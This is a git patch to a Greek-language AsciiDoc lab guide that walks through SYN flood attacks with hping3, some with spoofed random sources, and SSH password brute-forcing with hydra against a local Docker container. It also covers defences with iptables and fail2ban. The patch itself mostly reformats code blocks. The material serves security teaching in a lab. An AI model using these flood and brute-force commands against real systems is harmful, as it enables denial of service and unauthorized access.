From da09eb6750a70054c226e525bd8d67137944e235 Mon Sep 17 00:00:00 2001 From: Iro_Val Date: Wed, 13 Jan 2021 13:53:23 +0000 Subject: [PATCH] Update 'project_info.adoc' --- project_info.adoc | 108 +++++++++++++++++++++------------------------- 1 file changed, 50 insertions(+), 58 deletions(-) diff --git a/project_info.adoc b/project_info.adoc index 0cb879d..f6617c7 100644 --- a/project_info.adoc +++ b/project_info.adoc @@ -112,9 +112,9 @@ sudo password: docker + === Βρίσκοντας την IP ==== ----- +``` ifconfig ----- +``` image:images/if_config.png[] TIP: IP: 172.19.0.2 @@ -122,9 +122,9 @@ TIP: IP: 172.19.0.2 === Βρίσκοντας τους ενεργούς hosts ==== ----- +``` nmap -sP ----- +``` image:images/nmap_p.png[] TIP: Αν η IP είναι π.χ. 172.19.0.2, αντί για το τελευταίο νούμερο βάζουμε *. @@ -133,33 +133,31 @@ TIP: Αν η IP είναι π.χ. 172.19.0.2, αντί για το τελευτ === Ενεργές πόρτες ==== ----- +``` nmap –p– ----- +``` image:images/nmap_for_ports.png[] TIP: Εδώ φαίνεται ανοιχτή η πόρτα 22 ==== === Εγκατάσταση hping3 -==== ----- +``` sudo apt update sudo apt install hping3 ----- -==== +``` === Εκτέλεση ==== ----- +``` sudo hping3 -S -a -p --flood ----- +``` image:images/1st_hping3.png[] + ή + ----- +``` sudo hping3 -S --flood -V -p ----- +``` image:images/2nd_hping3.png[] Όπου: + @@ -170,9 +168,9 @@ image:images/2nd_hping3.png[] -p: port number + SYN packets flood: + ----- +``` sudo hping3 -q -n -d 120 -S -p --flood --rand-source ----- +``` image:images/3rd_hping3.png[] Όπου: + @@ -184,13 +182,13 @@ image:images/3rd_hping3.png[] === Βλέποντας το flood ==== ----- +``` sudo tcpdump -ni ----- +``` ή + ----- +``` sudo tcpdump src ----- +``` Πρώτο attack: + image:images/1st_flood.png[] + Δεύτερο attack: + @@ -204,13 +202,13 @@ image:images/3rd_flood.png[] + Ένας τρόπος για να αποφευχθούν τα attacks είναι με χρήση των iptables. Είναι κάποιοι κανόνες που μπορούμε να δηλώσουμε ώστε να απαγορεύσουμε/επιτρέψουμε την διέλευση πακέτων. Παρακάτω χρησιμοποιήθηκε κανόνας που κόβει την κίνηση από μία συγκεκριμένη IP. ==== Τα παρακάτω χρειάζονται sudo: + ----- +``` iptables -I INPUT -s -j DROP ----- +``` Για να δούμε τους κανόνες: + ----- +``` iptables -L ----- +``` image:images/ip_tables.png[] + Με την iptables -nvL μπορούμε να δούμε και στατιστικά, όπως πόσα πακέτα έχουν απορριφθεί από τον κάθε κανόνα. ==== @@ -218,27 +216,27 @@ image:images/ip_tables.png[] + == SSH Brute Force Attacks === SSH Attack with Hydra * Εγκατάσταση hydra + -==== ----- + +``` apt-get install hydra ----- -==== +``` + * Password list + ==== ----- +``` wget https://downloads.skullsecurity.org/passwords/500-worst-passwords.txt.bz2 bzip2 -d 500-worst-passwords.txt.bz2 ----- +``` TIP: Μπορούμε να επεξεργαστούμε το αρχείο και να προσθέσουμε και δικά μας passwords ==== * Find IP address of docker: + ==== ----- +``` ifconfig ----- +``` image:images/ssh_find_ip.png[] + TIP: Είναι 172.19.0.1 + @@ -246,31 +244,31 @@ TIP: Είναι 172.19.0.1 + * Network range: + ==== ----- +``` ipcalc ----- +``` image:images/ssh_ipcalc.png[] + ==== * Scan for open ssh ports: + ==== ----- +``` nmap -p 22 --open ----- +``` image:images/ssh_open_ports.png[] + ==== * Execute SSH brute force attack: + ==== Η γενική σύνταξη της εντολής είναι (επειδή γνωρίζουμε το username): + ----- +``` hydra -l username -P passwords_file.txt ssh://IP -t no_of_tasks ----- +``` Άρα γίνεται: + ----- +``` hydra -l docker -P '/home/iro/Desktop/500-worst-passwords.txt' ssh://172.19.0.3 -t 8 ----- +``` image:images/ssh_success.png[] + TIP: Password: docker + @@ -282,35 +280,29 @@ hydra -L usernames.txt -P passwords.txt ssh://172.19.0.3 -t 8 Το Fail2Ban είναι ένα open-source εργαλείο που αποσκοπεί στο να προστατεύει τα συστήματα από ssh brute force attacks. + * Εγκατάσταση: -==== ----- +``` sudo apt-get install fail2ban sudo apt-get -y install rsyslog sudo rsyslogd ----- -==== +``` * Backup Fail2Ban main configuration file (just in case) -==== ----- +``` cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local ----- -==== +``` * Configure Fail2Ban -==== ----- +``` nano /etc/fail2ban/jail.local ----- -==== +``` * Φτιάχνουμε ένα ssh section και αλλάζουμε τις τιμές ανάλογα με τις προτιμίσεις μας. Δεν ξεχνάμε να κάνουμε restart την υπηρεσία στο τέλος. ==== image:images/ssh_jail.png[] + ----- +``` service fail2ban restart ----- +``` image:images/fail2ban_running.png[] + ==== @@ -328,13 +320,13 @@ image:images/docker_iptables_with_fail2ban.png[] + * Aν έχουμε κάνει τα προηγούμενα: + ==== Κάνουμε unban + ----- +``` sudo fail2ban-client unban --all ----- +``` Σταματάμε το fail2ban + ----- +``` sudo service fail2ban stop ----- +``` ==== * Βρίσκουμε το αρχείο sshd_config και το ανοίγουμε + ====